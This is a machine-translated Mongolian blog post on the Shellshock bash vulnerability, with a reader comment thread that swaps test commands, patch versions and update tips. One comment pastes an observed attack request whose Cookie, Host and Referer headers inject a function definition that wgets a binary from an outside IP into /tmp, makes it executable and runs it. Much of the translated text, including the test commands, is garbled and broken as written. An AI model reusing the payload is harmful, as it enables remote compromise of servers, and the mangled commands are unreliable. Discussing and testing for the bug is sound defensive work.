Bash: шинэ эмзэг байдлыг илрүүлсэн (мөн засах)

Энэ нь зарим блог дээр гал түймэр шиг асч байгаа нь нийтлэгдсэн мэдээ юм аюулгүй байдлын блог de улаан малгай дэлхийн хувьсагчдыг буруу ашигласнаас болж Башид илэрсэн эмзэг байдлын тухай. Анхны мэдээний дагуу:

“... Эмзэг байдал нь bash shell руу залгахаасаа өмнө тусгайлан боловсруулсан утгуудаар орчны хувьсагчийг бий болгож чаддагтай холбоотой юм. Эдгээр хувьсагчууд бүрхүүлийг дөнгөж дуудангуут ​​гүйцэтгэсэн кодыг агуулж болно. Эдгээр боловсруулсан хувьсагчдын нэр нь чухал биш, зөвхөн тэдгээрийн агуулга юм. Үүний үр дүнд энэхүү эмзэг байдал олон нөхцөл байдалд илэрч байнаЖишээ нь:

  • ForceCommand Энэ нь алслагдсан хэрэглэгчдэд хязгаарлагдмал команд гүйцэтгэх чадварыг хангахын тулд sshd тохиргоонд ашиглагддаг. Энэ алдааг үүнээс зайлсхийх, дурын тушаалын гүйцэтгэлийг хангахад ашиглаж болно. Зарим Git ба Subversion хэрэгжүүлэлтүүдэд ийм хязгаарлагдмал бүрхүүлийг ашигладаг. Хэрэглэгчид аль хэдийн консол руу нэвтрэх боломжтой тул OpenSSH-ийн байнгын хэрэглээнд нөлөөлөхгүй.
  • CGI скриптүүдийг хоёулаа bash дээр бичих эсвэл дэд түвшнүүдэд төрөх тохиолдолд mod_cgi эсвэл mod_cgid ашигладаг Apache сервер нөлөөлнө. Ийм дэд түвшнүүдийг PHP дээр system / exec бүрхүүл ашиглаж байгаа бол system / popen, Python дахь os.system / os.popen, далд байдлаар ашигладаг. (CGI горимд ажиллаж байх үед), Perl дээр нээлттэй / систем (энэ нь командын мөрөөс хамаарна).
  • Mod_php програмаар гүйцэтгэсэн PHP скриптэд дэд түвшин тоглогдсон байсан ч нөлөөлөхгүй.
  • DHCP клиентүүд системийг тохируулахын тулд бүрхүүлийн скриптүүдийг дуудаж, хортой байж болзошгүй серверээс авсан утгуудыг оруулна. Энэ нь DHCP клиент машин дээр дурын тушаалуудыг ихэвчлэн root хэлбэрээр гүйцэтгэх боломжийг олгоно.
  • SUID-тэй давуу эрх бүхий янз бүрийн демонууд болон програмууд нь хэрэглэгчийн тохируулсан / нөлөөлсөн орчны хувьсах утгуудтай бүрхүүлийн скриптүүдийг ажиллуулж чаддаг бөгөөд энэ нь дурын командуудыг гүйцэтгэх боломжийг олгодог.
  • Бэшийг орчуулагч болгон ашиглах гэх мэт бүрхүүлтэй холбогддог эсвэл бүрхүүл скрипт ажиллуулдаг бусад програмууд. Хувьсагч экспортлодоггүй Shell скриптүүд нь найдваргүй агуулгыг боловсруулж хадгалсан ч гэсэн энэ асуудалд өртөхгүй. бүрхүүлийн хувьсагчууд (зүүн) ба дэд түвшнүүд нээгдэнэ.

... "

Миний башид нөлөөлсөн эсэхийг яаж мэдэх вэ?

Үүнийг харгалзан энэ эмзэг байдал бидэнд нөлөөлж байгаа эсэхийг мэдэх маш энгийн арга байдаг. Үнэндээ би Antergos дээрээ туршиж үзсэн бөгөөд надад ямар ч асуудал байхгүй бололтой. Бидний хийх ёстой зүйл бол терминал нээгээд дараахь зүйлийг тавих явдал юм.

env x = '() {:;}; echo эмзэг 'bash -c "echo энэ бол тест"

Хэрэв ийм байдлаар гарах юм бол бидэнд ямар ч асуудал байхгүй.

env x = '() {:;}; echo эмзэг 'bash -c "echo энэ бол тест юм" bash: анхааруулга: x: функцын тодорхойлолтыг үл тоомсорлох bash: "x" функцын тодорхойлолтыг импортлоход алдаа гарсан нь энэ тест юм

Хэрэв үр дүн нь өөр бол та манай давуу эрхийн хуваарилалтын шинэчлэх сувгуудыг нөхөөсийг аль хэдийн ашигласан эсэхийг шалгах хэрэгтэй. Тиймээс та мэднэ үү

Шинэчлэгдсэн: Энэ бол Ubuntu 14:04 ашиглан хамт ажилладаг хүний ​​гаргасан үр дүн юм:

env x = '() {:;}; echo эмзэг 'bash -c "echo this is a test" эмзэг энэ бол тест юм

Таны харж байгаагаар энэ нь эмзэг байна.


Нийтлэлийн агуулга нь бидний зарчмуудыг баримталдаг редакцийн ёс зүй. Алдааны талаар мэдээлэхийн тулд товшино уу энд байна.

66 сэтгэгдэл, үлдээгээрэй

Сэтгэгдэлээ үлдээгээрэй

Таны и-мэйл хаяг хэвлэгдсэн байх болно. Шаардлагатай талбарууд нь тэмдэглэгдсэн байна *

*

*

  1. Мэдээллийг хариуцах: Мигель Анхель Гатан
  2. Мэдээллийн зорилго: СПАМ-ыг хянах, сэтгэгдлийн менежмент.
  3. Хууль ёсны байдал: Таны зөвшөөрөл
  4. Мэдээллийн харилцаа холбоо: Хуулийн үүргээс бусад тохиолдолд мэдээллийг гуравдагч этгээдэд дамжуулахгүй.
  5. Өгөгдөл хадгалах: Occentus Networks (ЕХ) -с зохион байгуулсан мэдээллийн сан
  6. Эрх: Та хүссэн үедээ мэдээллээ хязгаарлаж, сэргээж, устгаж болно.

  1.   Gerson гэж хэлэв

    Надад 14.04-ээс Kubuntu 64 байгаа бөгөөд би дараахь зүйлийг авах болно.

    env x = '() {:;}; echo эмзэг 'bash -c "echo энэ бол тест"
    эмзэг
    энэ бол тест

    Би аль хэдийн шинэчлэгдсэн, гэхдээ энэ нь залруулаагүй байна. Юу хийх вэ?

    1.    elav гэж хэлэв

      Тэд шинэчлэгдэхийг хүлээнэ үү. Жишээ нь eOS-ийг аль хэдийн шинэчлэв. ..

    2.    Хуан гэж хэлэв

      Хачирхалтай нь надад Kubuntu 14.04 байдаг

      $ env x = '() {:;}; echo эмзэг 'bash -c "echo энэ бол тест"
      bash: анхааруулга: x: функцийг тодорхойлох оролдлогыг үл тоомсорлох
      bash: "x" функцын тодорхойлолтыг импортлоход алдаа гарав.
      энэ бол тест

      1.    Хуан гэж хэлэв

        Өнөөдөр татаж авсан "bash" багцын хувилбар нь:
        4.3-7убунту1.1

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 гэж хэлэв

      Миний хувьд тушаал өгч, энэ нь надад терминал дээр дараахь зүйлийг өгдөг.

      >

      Ямартай ч хошигнол бол би Debian Wheezy-г шинэчилсэн бөгөөд энэ нь намайг хаясан юм.

      1.    Юкитеру гэж хэлэв

        Wheezy нь алдааны хоёр дахь хэсэгт эмзэг хэвээр байгаа бөгөөд наад зах нь үдээс хойш (UTC -4: 30) асуудал дараахь хэвээр байна: /

  2.   петерчеко гэж хэлэв

    Өнөө өглөө шинэчлэлт хийсний дараа Slackware, Debian, Centos нар хоёулаа холбогдох шинэчлэлтийг хүлээн авахад нөлөөлөхгүй гэдгийг би саяхан баталгаажууллаа.

    Энэ цагт Ubuntu эмзэг хэвээр байгаа нь юу вэ? Аюулгүй гэж хэлээрэй: Д.

    1.    Хуан гэж хэлэв

      Гэхдээ та Ubuntu-г шинэчлэхийг оролдсон уу?
      Өнөөдрийн шинэчлэлтээр тэд үүнийг засч залруулсан.

      1.    петерчеко гэж хэлэв

        OK

    2.    робот гэж хэлэв

      Аюулгүй байдлын мэргэжилтнүүд 'Bash' -ийн эмзэг байдлын талаар анхааруулж байгаа бөгөөд энэ нь Линукс програм хангамжийн хэрэглэгчдэд Heartbleed-ийн алдаанаас илүү их аюул учруулж болзошгүй юм.
      Цахим аюулгүй байдлын Rapid7 компанийн инженер менежер Тод Бирдсли алдаагаа хүнд байдлаар нь 10 гэж үнэлсэн нь хамгийн их нөлөө үзүүлдэг, ашиглалтын нарийн төвөгтэй байдлын хувьд "доогуур" гэсэн утгатай бөгөөд "хакер" халдлагад харьцангуй хялбар байдаг гэж анхааруулсан. . Энэхүү эмзэг байдлыг ашигласнаар халдагчид үйлдлийн системийг хянах, нууц мэдээлэлд хандах, өөрчлөлт оруулах гэх мэт үйлдлийг гүйцэтгэх боломжтой "гэж Бердсли хэлэв. "Башыг эзэлдэг системтэй хэн бүхэн даруй нөхөөсөө түрхэх хэрэгтэй" гэж тэр нэмж хэлэв.
      Бах байрладаг ХУУЧИН ХЭРЭГСЛИЙГ (GNU) ТАНИЛЦУУЛДАГ ЭНЭ ЭМЭГТЭЙ БАЙДЛЫН ӨМНӨ Линукс програм хангамж GNU-ээс салж, BSD хэрэгслийг өөрчлөх нь илүү тохиромжтой байх болно.

      Жич: миний үзэл бодлоо чөлөөтэй илэрхийлэх эрх чөлөөгөө БИЧИГЛЭХГҮЙ, ... хэнийг ч доромжилж битгий доромжил, ... миний өмнөх мессеж шиг миний мессежийг битгий устгаарай!

      1.    Xerix гэж хэлэв

        Өө гуйя, битгий хэтрүүлээрэй. Би эдгээр төслүүдээс BSD ашигладаг, GNU, Linux эсвэл бусад зүйлийг жигшдэг хүмүүсийг хэрхэн үзэн яддаг вэ.

      2.    петерчеко гэж хэлэв

        Би чамтай хамт байгаа бөгөөд та энэ нүхний хатуу байдлын талаар туйлын зөв юм.

      3.    диазепан гэж хэлэв

        Энэ бол цензур биш, илүүдэл байсан (та gnome 3.14 бичлэг дээр ижил тайлбар хийсэн байсан)

      4.    Staff гэж хэлэв

        «… Мөлжлөгийн нарийн төвөгтэй байдлаас болж 'LOW' үнэлгээ авсан нь хакеруудын халдлагад харьцангуй хялбар гэсэн үг юм»

        Үл нийцэх байдал мэдэгдэхүйц байна уу?
        Энэ эмзэг байдлыг ашиглахад хялбар байхын зэрэгцээ үүнийг ашиглахад маш төвөгтэй тул "бага" эрсдэлтэй байх вэ?
        Энэ бол уулзалтаас хойш хэдэн цагийн дараа шийдэгдсэн алдаа бөгөөд зүрхний шиг болсон, мөлжлөгт өртсөн тухай мэдээлэл байхгүй болно (Мэдээжийн хэрэг, энэ нь бие биенээ таних цаг багатай).
        Энэ бол бодит эрсдлээс илүү шар хэвлэл юм.

      5.    петерчеко гэж хэлэв

        @Staff танд чухал биш юм шиг санагдаж байна уу? Одоо надад юу хэлэх вэ?

        АВАХ ./.HTTP/1.0
        .Хэрэглэгч-Агент: .Баярлалаа-Роб
        .Күүки: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Хост: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Referer: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Хүлээн авах :. * / *

        $ файл nginx
        nginx: ELF 32 битийн LSB програм, Intel 80386, хувилбар 1 (SYSV), статикаар холбогдсон, GNU / Linux 2.6.18-д зориулж хуулагдсан

        $ md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $ sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Энэ юу болохыг та мэдэх үү? Бага аюултай зүйл байхгүй ...

      6.    Юкитеру гэж хэлэв

        Нөхцөл байдал нэлээд ноцтой байна, гэхдээ та BSD тохиргоонд bash ашиглахаа болих хэрэгтэй гэж хэлэх нь зүйтэй юм, энэ нь аль хэдийн шинэчлэгдсэн байгаа, гэхдээ би шинэчлэлт дээр л хүрч байна, өөр зүйл байхгүй.

        Одоо PD, би үүнийг илүү их хамтран ажиллагч гэж боддог @robet, энд байгаа админууд ийм сэтгэгдлүүдийг устгахад зориулагдаагүй гэж бодож байна, яагаад гэвэл тийм ээ, учир нь би энэ нийгэмлэгт оролцсоноос хойш ийм сэтгэгдэл туулсан, тийм хэвээр байх болно гэж найдаж байна.

        Сайн байцгаана уу.

      7.    elav гэж хэлэв

        Та яг ижил сэтгэгдлийг хоёр өөр бичлэг дээр тавьжээ. Хэрэв та түүхийн "эх сурвалж" -ийг сурталчлах гэж байгаа бол уучлаарай, энэ газар биш юм.

      8.    Марио гэж хэлэв

        Bash нь Unix (мөн түүний GNU клон) -оос ирдэг. OSX гэх мэт BSD дээр суурилсан системүүд бас өртдөг бөгөөд Genbeta-ийн хэлснээр тэд үүнийг одоохондоо нөхөөгүй байна. Үүнтэй адил Bash-д нэвтрэхийн тулд танд хэрэглэгчийн данс хэрэгтэй.

      9.    Юкитеру гэж хэлэв

        @ Ажил:

        1.- Алдаанд өртөж болзошгүй үйлчилгээний хэмжээнээс шалтгаалан 10-р түвшин (аюулын дээд түвшин) гэж ангилдаг. Гол тэмдэглэлд тэд алдаа нь apache, sshd, suid зөвшөөрөлтэй програмууд (xorg, бусад) зэрэг үйлчилгээнд нөлөөлж болзошгүй гэж үзэн энэ баримтыг маш тодорхой харуулж байна.

        2.- Үүнийг хэрэгжүүлэхэд бэрхшээлийн доод түвшин гэж ангилдаг бөгөөд хамгийн сайн жишээ бол @elav-ийн постонд байрлуулсан эмзэг байдлын тестийн скрипт юм. Үүнийг хэрэгжүүлэхэд маш хэцүү байдаг.

        Мэдээлэл дээр илүүдэл байгааг би олж харахгүй байна (би зөвхөн Google-ийн орчуулгыг л хардаг), хэрэв асуудал нэлээд ноцтой байгаа бөгөөд таны хэлснээр аль хэдийн засвар, шийдэлтэй байсан, гэхдээ тийм биш бол энэ нь эрсдэл биш болно, бас бодит зүйл.

      10.    Staff гэж хэлэв

        @petercheco / @ Yukiteru

        Намайг битгий буруугаар битгий тайлбарлаарай, миний шүүмжлэл бол Робет холболт хийдэг, илүүдэл биш, таарамжгүй байдал дээр төвлөрсөн мэдээ юм гэдэг нь ойлгомжтой гэж бодож байна.

        Үүнтэй адилаар бид эрсдэл ба аюулыг хооронд нь ялгаж салгах ёстой (сүүлд нь би дурдаагүй), бид тэдгээрийг ижил утгатай үг болгон ашигладаг, гэхдээ энд аюул нь алдааны хохирол учруулах хүчин чадал бөгөөд үүсэх магадлалыг эрсдэлд оруулах болно.
        Миний хувьд, өчигдрөөс орж ирсэн. Энэ нь захидлын жагсаалт эсвэл үүнтэй төстэй зүйл биш юм. Энэ нь ширээний хуваарилалтад зориулагдсан юм! Би утсаа аваад sysadmin руу линкийн хамт мессеж явуулаад би бүх юмаа нөхсөн гэдгээ баталж, дараа нь намайг уучлаарай, гэхдээ энэ мэдээ намайг унтуулдаггүй.

      11.    робот гэж хэлэв

        Бусад форум дээр тэд Bash эмзэг байдлын талаар "Debian ба Ubuntu-ийн гаргасан шийдэл" -ний талаар дурдсан боловч өнөөдөр тэд сул тал байсаар байгааг олж мэдсэн тул шийдэл нь бүрэн гүйцэд хийгдээгүй байна.

        Хүмүүсийг эмзэг байдлын хүнд байдлаас урьдчилан сэргийлэх, хамгийн их аюулын 10-р түвшинд тэнцсэн, Баш байрладаг GNU хэрэгслийн өмнө Linux програм хангамжийн боломжит шийдлүүдийн талаар дурдсан энгийн баримт гэж олон хүн намайг шүүмжилж байна. GNU-г Линуксийн програм хангамжийн BSD хэрэгслээр сольж болох юм ... Би бас Линукс ашигладаг, бас Линуксд дуртай!

        Bash нь анхнаасаа BSD-д суулгаагүй тул энэ нь BSD-д суулгаж болох өөр нэг Линуксийн нийцлийн багц юм гэдгийг би тодорхой болгож байна ... тийм ээ! Ихэнх хэрэглэгчид заримдаа мессеж эсвэл сэтгэгдэлд итгэдэггүй тул мэдээг шалгаж үзэхийн тулд эх сурвалжийг байрлуулсан болно.

        1.    elav гэж хэлэв

          робот: Тэд танд дахин дахин хэлсэнчлэн та сэтгэгдлээ аль хэдийнээ постонд оруулсан тул та сэтгэгдэл бичсэн бүх зүйлдээ үүнийг оруулах шаардлагагүй болно.

          Баш дээр эмзэг тохиолдолд ашиглах боломжтой бусад бүрхүүлүүд байдаг. 😉

      12.    Марио гэж хэлэв

        Робот, линукс цөмийг BSD хэрэглэгчийн талбартай хослуулсан програм гэж байдаггүйг би мэддэг. Хамгийн ойрын зүйл бол эсрэгээрээ Gentoo, Debian-тай адил kBSD + GNU юм. Үүнээс гадна, GNU (1983) нь BSD (1977) -ээс хойш гарсан бол "хуучинсаг" гэж нэрлэх боломжгүй юм. Тэд хоёулаа unix root-гээ хуваалцдаг (гэхдээ кодыг нь биш), хэрэв Линус Т-ийг бага байхад Баш бүтээсэн бол "Линуксийн нийцтэй байдал" байхгүй болно.

  3.   manuelperezf гэж хэлэв

    уфф, дебийн тест энэ үед "эмзэг" байна.

    1.    mrcelhw гэж хэлэв

      Би Debian Testing ашигладаг бөгөөд энэ салбарт хүртэл бид bash шинэчлэлтийг хүлээн авсан

  4.   диазепан гэж хэлэв

    genbeta-ийн дагуу бас нэг эмзэг байдал бий
    http://seclists.org/oss-sec/2014/q3/685

    асуулга хийх тушаал нь
    env X = '() {(a) => \' sh -c "echo эмзэг"; bash -c "echo Failure 2-ийг нөхөөгүй"

    1.    elav гэж хэлэв
      env X = '() {(a) => \' sh -c "echo эмзэг"; bash -c "echo Unpatched Failure 2" sh: X: мөр 1: санаанд оромгүй элементийн ойролцоо синтаксийн алдаа Алдаа 1-ийг нөхөөсгүй хийх
      
      1.    диазепан гэж хэлэв

        адилхан би.

      2.    Жискар гэж хэлэв

        Энд адилхан. Гэхдээ бичлэг дээрх анхны алдааг (L) Ubuntu 14.04 дээр нөхөв

      3.    x11tete11x гэж хэлэв

        Энгийн цуурай хийхийн оронд давуу эрх шаардсан зааврыг хэрэгжүүлэхийг хичээгээрэй, би "хангалтгүй давуу эрх" шиддэг ... энэ алдаа нь давуу эрхийг нэмэгдүүлэхгүй байна уу?

      4.    Xurxo гэж хэлэв

        Чиний зөв!! тэд хоёр эмзэг байдал байсан ...

        Өчигдөр орой Ubuntu-ийн агуулахад оруулсан хоёр дахь bash шинэчлэлтийн дараа Linux Mint 17 дээр надад бүрхүүл нь дараах үр дүнг санал болгож байна.

        env X = '() {(a) => \' sh -c "echo эмзэг"; bash -c "echo Fail 2-ийг нөхөөгүй"
        >

        Өмнөх хувилбаруудыг шинэчлэх зорилгоор Ubuntu-ийн агуулахад байрлуулсан "bassh" хувилбар нь:

        4.3-7убунту1.2

        Debian-ийн үүсгэсэн систем дээр та суулгасан хувилбарыг дараах тушаалаар шалгаж болно.

        dpkg -s bash | grep хувилбар

        Аль ч тохиолдолд үүнийг дор хаяж Debian, Ubuntu, Mint хэрэглэгчдэд зориулж тодруулах хэрэгтэй; Скриптийг #! / Bin / sh толгойтой ажиллуулдаг програмуудын талаар та хэт их санаа зовох хэрэггүй, учир нь эдгээр тархацууд дээр / bin / sh нь "bash" гэж дууддаггүй, харин "dash" бүрхүүлтэй холбогддог (dash is :)

        Debian Alchemist Console (зураас) нь POSIX гаралтай консол юм
        үнсний.
        .
        Энэ нь скриптүүдийг bash-ээс хурдан гүйцэтгэдэг тул хамаарал багатай байдаг
        номын сангууд (програм хангамжийн алдаанаас илүү хүчтэй болгох эсвэл
        тоног төхөөрөмж), үүнийг систем дээр анхдагч системийн консол болгон ашигладаг
        Дебиан.

        Тиймээс, хамгийн багадаа Ubuntu дээр "bash" -ийг хэрэглэгчийн нэвтрэх бүрхүүл болгон ашигладаг (мөн root хэрэглэгчийн хувьд). Гэхдээ хэрэглэгч болон root консол (терминал) -д зориулж аливаа хэрэглэгч өөр бүрхүүлийг анхдагчаар ашиглаж болно.

        Бүрхүүл нь скриптүүдийг (#! / Bin / sh) гүйцэтгэж байгаа эсэхийг эдгээр тушаалуудыг гүйцэтгэж шалгахад хялбар байдаг.

        файл / bin / sh
        (гаралт нь / bin / sh: тэмдгийн холбоосыг "зураас" болгоно) бид командыг давтаж мөрийг дагаж мөрдөнө

        file / bin / dash
        (гаралт нь / bin / dash: ELF 64 битийн LSB хуваалцсан объект, x86-64, хувилбар 1 (SYSV) тул энэ нь гүйцэтгэгдэх боломжтой юм.

        Эдгээр нь Linux Mint 17 түгээлтийн үр дүн юм. Бусад Ubuntu / Debian дээр суурилсан дистрибьютер дээр тэдгээр нь өөр байж болно.

        Анхдагч бүрхүүлийг өөрчлөх нь тийм ч хэцүү биш юм !! та хэрэглэгчид болон root хэрэглэгчид өөрийг ашиглаж болно. Үнэндээ та хүссэн бүрхүүлээ суулгаж, "chsh" тушаалаар эсвэл / etc / passwd файлыг засах замаар анхдагч тохиргоог өөрчлөх хэрэгтэй (хэдийгээр "passwd" файлыг засахдаа алдааны үр дагаврыг мэдэхгүй хэрэглэгчид, Өөртөө маш сайн мэдэгдэж, засахаасаа өмнө эх хувийг нь сэргээх шаардлагатай бол хуулбарыг нь хийх нь дээр.

        "Tcsh" надад илүү тохь тухтай санагддаг (tcsh бол :)

        TENEX C консол, Berkeley csh-ийн сайжруулсан хувилбар

        "Csh" бол хэдэн жилийн өмнө Mac OS X-ийг ашиглаж байсан зүйл юм. Apple-ийн үйлдлийн системийн ихэнх хэсэг нь FreeBSD код гэдгийг харгалзан үзэх логик зүйл бий. Өчигдөр миний уншсан зүйлээс харахад тэд хэрэглэгчийн терминалуудад зориулж "bash" -ийг өгдөг бололтой.

        ДҮГНЭЛТ:

        - "bash" -ын нөхөөстэй хувилбаруудыг "хамгийн их ашиглагддаг тархацуудад зориулж" тараасан байна.
        - "bash" хувилбар 4.3-7ubuntu1.2 ба дараа нь эдгээр алдааг агуулаагүй болно
        - OS * Linux дээр заавал "bash" ашиглах шаардлагагүй
        - Цөөхөн * Linux дистрибьюторыг "bash" -тай холбосон #! / Bin / sh.
        - Үнс, зураас, csh, tcsh гэх мэт өөр хувилбарууд байдаг
        - Терминал нээх үед системийн дууддаг анхдагч бүрхүүлийг өөрчлөх нь тийм ч төвөгтэй биш юм
        - Цөөхөн хэдэн жижиг төхөөрөмжүүд (чиглүүлэгчид болон бусад) "bash" ашигладаг, яагаад гэвэл энэ нь маш том !!

      5.    Xurxo гэж хэлэв

        Яг одоо "bash" 4.3-7ubuntu1.3-ийн өөр хувилбарыг суулгасан өөр нэг шинэчлэлт саяхан ирлээ

        Linux Mint 17 ба Ubuntu 14.04.1 LTS-ийн хувьд

        1.    elav гэж хэлэв

          ArchLinux bash-4.3.026-1 хувилбарыг оруулсан

    2.    робот гэж хэлэв

      @ Xurxo .... Bershley-ээс ирсэн .csh?,… Та миний дээр хэлсэн зүйлийг ойлгодог. Bash байрладаг хуучин GNU хэрэгсэл гэхээсээ илүү BSD “csh” -ийг ашиглах нь дээр. Энэ хэрэгсэл нь Линуксийн програм хангамжийн хувьд хамгийн сайн хэрэгсэл юм.

  5.   нэргүй гэж хэлэв

    Энэ алдаа гэж би бодож байна

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    үнэн үү?

  6.   Гонзало гэж хэлэв

    Шийдэл нь юу вэ?

    1.    elav гэж хэлэв

      Тэд таны хуваарилалт дээрх багцыг шинэчлэхийг хүлээнэ үү

  7.   диазепан гэж хэлэв

    Алдааг shellshock гэж баптисм хүргэсэн
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   Пабло Иван Корреа гэж хэлэв

    эмзэг
    энэ бол тест

    Ubuntu Studio 14.04 дээр хараахан нөхөөгүй байна

    1.    Wisp гэж хэлэв

      Ubuntu Studio 14.04.1-д засвар хийсэн
      wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo эмзэг 'bash -c "echo энэ бол тест"
      bash: анхааруулга: x: функцийг тодорхойлох оролдлогыг үл тоомсорлох
      bash: "x" функцын тодорхойлолтыг импортлоход алдаа гарав.
      энэ бол тест

  9.   замчин гэж хэлэв

    Үнэндээ энэ бол бага зэргийн эмзэг байдал, хэрэв танд нөлөөлж байвал та өмнө нь буруу зүйл хийж байсан ...

    Учир нь root эрхээр ажилладаг bash скрипт хэрэглэгчид хэзээ ч өртөх ёсгүй. Хэрэв тэр давуу эрхгүйгээр гүйдэг бол ийм эрх мэдэл байхгүй. Үнэндээ энэ бол тэнэг хэрэг. Маш их аймшигтай.

    1.    Xerix гэж хэлэв

      Би ч мөн адил бодож байна.

    2.    Staff гэж хэлэв

      Яг л олон сонин зарах эсвэл олон зочлохын тулд эдгээр алдаанууд сайн байдаг.
      Гэхдээ эдгээр төрлийн скриптүүдтэй компьютерээ буулгахын тулд та bash-т хандах эрх олж аваад дараа нь root болгон ашиглах хэрэгтэй гэдгийг тэд үргэлж мартдаг.

      1.    daryo гэж хэлэв

        Хэрэв та cgi-тэй apache ашигладаг бол http толгойг нь күүки хэлбэрээр оруулах эсвэл гүйцэтгэхийг хүсч буй функцэд чиглүүлэх хэрэгтэй. Тэр ч байтугай өт тараахад ашиглаж байсан.

    3.    daryo гэж хэлэв

      хэрэв хэн нэгэн нь wget mishell.php-тэй сервер рүү бүрхүүл байрлуулсан бол энэ нь тийм ч ноцтой биш биз дээ?

    4.    eliotime3000 гэж хэлэв

      Тантай санал нэг байна. Энэ нь Heartbleed-т гардаг шиг том алдаа байсан гэж бодсон (NSA хүртэл өвчнийг өдөөх зорилгоор зээл олгосон), гэхдээ эцэст нь энэ нь жижиг алдаа байсан.

      Flash-ийн галзуу хэрэглээ, Pepper Flash Player-ийн гүйцэтгэл буурсан гэх мэт үнэхээр ноцтой алдаанууд байгаа бөгөөд үүнийг засчихсан байгаа. Chrome болон Firefox дээрх webRTC алдаа.

  10.   Биндэрман гэж хэлэв

    Энэ нь Linux Mint 16-тэй хүмүүст зориулсан зохицуулалттай эсэхийг та мэдэх үү?

  11.   Оскар гэж хэлэв

    Debian тест дээр үүнийг аль хэдийн зассан байсан.

  12.   Ёо ёо гэж хэлэв

    Миний 5 хуваарилалтад үүнийг шийдсэн, миний OS X дээр би мэдэхгүй байна.

    Миний сэтгэгдэлд цензур битгий хийгээрэй, би OS X гэж хэлсэн. Та энэ сайт дээр OS X гэж хэлж чадах эсэхийг мэдэхгүй байна.

    1.    таннхауссер гэж хэлэв

      @yoo за, тэд нөхөөсний зарим нарийн ширийн зүйлийг үргэлжлүүлэн хийж байгаа тул битгий хэтрүүлээрэй ... үүнийг туршаад дараа нь XD-ийн талаар надад хэлээрэй.

      env x = '() {:;}; echo эмзэг 'bash -c "echo Би iphone 6 хог хаягдлаас илүү эмзэг байна"

      Хэрэв тэд OS X-ээс өмнө 100% шийдсэн бол би юу ч бооцоо тавих болно

    2.    eliotime3000 гэж хэлэв

      Ars Technica-д ч гэсэн тэд OSX дээр Bash-тэй холбоотой байдаг.

    3.    elav гэж хэлэв

      @Yoyo СПАМ-д зориулсан OS X-ийн дараагийн тайлбар .. lla tu save .. 😛

  13.   таннхауссер гэж хэлэв

    @yoyo тэнд үнийн саналыг засахаар ... гэхдээ үлдсэнийг нь та мэднэ үү 😉

    1.    eliotime3000 гэж хэлэв

      Тэд OSX-ийг ивээн тэтгэх болсон (OSX нь Bash: v-ийг ашигладаг хэвээр байгаа тул).

      Юутай ч би Дэбиан Жесситэй тийм их заваарах хэрэггүй.

  14.   elhui2 гэж хэлэв

    Хэрэв систем нь Cent OS дээр эмзэг байвал:
    yum clean all && yum update bash

    bash хувилбарыг харах:
    rpm -qa | grep bash

    Хэрэв хувилбар bash-4.1.2-15.el6_5.1-ээс хуучин бол таны систем эмзэг байж магадгүй юм!

    Сайн байцгаана уу.

  15.   manuelperezf гэж хэлэв

    2-р эмзэг байдлыг хараахан шийдээгүй байна

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "echo Failure 2-ийг нөхөөгүй"

  16.   Жесус Пералес гэж хэлэв

    Шинэчилж байна ...

  17.   Swicher гэж хэлэв

    Gentoo-д надад эсрэг зүйл тохиолддог, би зөвхөн эхний бүтэлгүйтэлд өртөмтгий байдаг, гэхдээ хоёр дахь удаагаа би үүнийг олж авдаг.
    [код] sh: X: мөр 1: гэнэтийн элементийн ойролцоо синтаксийн алдаа "="
    sh: X: мөр 1: ""
    sh: "X" функцын тодорхойлолтыг импортлоход алдаа гарав.
    sh: эмзэг: тушаал олдсонгүй
    Алдаа 2-г нөхөөгүй байна
    [/ код]
    Алдааг нь зассан Bash-ийн тогтвортой хувилбар аль хэдийн гарах эсэхийг мэдэхгүй байна, гэхдээ дараа дараагийн удаа гарч ирэхийг хүлээх болно. Би гарч ирэх –sync && emerge –update –deep –with-bdeps = ба - newuse @world (энэ алхамыг би бүхэл бүтэн системийг шинэчлэх болно).

    1.    Юкитеру гэж хэлэв

      Надад 4.2_p50 хувилбартай Gentoo байгаа бөгөөд одоогоор бүх туршилтыг амжилттай даваад байна. Шинээр гарч ирж –sync гэж үзээд дараа нь -av1 app-shells / bash гарч ирээд bash –version командыг ашиглан 4.2_p50 хувилбартай эсэхээ шалгаарай.

  18.   Фер гэж хэлэв

    Та үүнийг туршиж үзсэн үү?

    Red Hat-ээс гаргасан шинэ багцууд, шинэ тест

    CD / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "echo date"; cat / tmp / echo

    Хэрэв манай систем эмзэг биш бөгөөд зөв нөхөөстэй бол бидэнд ийм зүйл өгөх ёстой
    1 огноо
    2 cat: / tmp / echo: Файл эсвэл директор байхгүй байна

  19.   Юкитеру гэж хэлэв

    Энэ аргыг туршаад үзээрэй.

    env X = '() {(a) => \' sh -c "echo эмзэг"; bash -c "echo Failure 2-ийг нөхсөн"

    Би авах

    эмзэг
    Алдаа 2-г нөхөв.

    1.    Юкитеру гэж хэлэв

      Үүнийг март, мөр нь маш муу форматлагдсан байна.

  20.   Оскар Меза гэж хэлэв

    Маш сайн! Би аль хэдийн Slackware дээрээ шинэчлэлт хийсэн, баярлалаа!

  21.   Лотброк гэж хэлэв

    Сайн уу, надад нэг асуулт байна, би "SUSE Linux Enterprise Server 10" 64 биттэй хэд хэдэн сервертэй.
    Би эмзэг гэсэн тушаалуудыг гүйцэтгэхдээ iPhone 6 xD-ийн хог хаягдлаас илүү эмзэг болдог
    Хэрэв SUSE-д багцуудыг шинэчлэх / суулгах нь буруу биш бол үүнийг "zypper" тушаалаар гүйцэтгэдэг.

    Зарим сервер дээр надад дараахь зүйлийг хэлж өгдөг.

    BIAL: ~ # zypper up
